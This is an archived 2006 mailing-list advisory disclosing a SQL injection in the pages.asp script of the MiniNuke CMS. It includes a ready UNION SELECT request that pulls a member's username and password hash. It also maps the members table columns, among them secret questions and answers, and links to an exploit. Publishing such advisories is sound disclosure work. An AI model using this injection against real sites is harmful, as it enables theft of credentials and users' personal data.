[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060220233918.4lb0mm0jzvw4ooc8@webmail.nukedx.com>
Date: Tue Feb 21 02:29:40 2006
From: nukedx at nukedx.com (nukedx@...edx.com)
Subject: MiniNuke CMS System all versions (pages.asp) SQL
Injection
**EDITED** 20/02/2006
--Security Report--
Advisory: MiniNuke CMS System all versions (pages.asp) SQL Injection
vulnerability
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 19/02/06 10:31 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@...edx.com
Web: http://www.nukedx.com
}
---
Vendor: MiniNuke (www.mini-ex.net) (www.mininuke.info)
Version: All versions released from this vendors.
About:Via this method remote attacker can inject SQL query to the pages.asp
---
How&Example:
GET -> http://[site]/pages.asp?id=1%20[SQLQuery]
Example ->
http://[site]/pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=1
So with this example remote attacker can get userid 1's hashed password.
Columns of MEMBERS:
uye_id = userid
sifre = md5 password hash
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
icq = ICQ Uin
msn = MSN Sn.
aim = AIM Sn.
meslek = job
cinsiyet = gender
yas = age
url = url
imza = signature
mail_goster = show mail :P
avurl = avatar url
avatar = avatar
--
Exploit:
http://www.nukedx.com/?getxpl=9
--
Original advisory:
http://www.nukedx.com/?viewdoc=9
--
Powered by blists - more mailing lists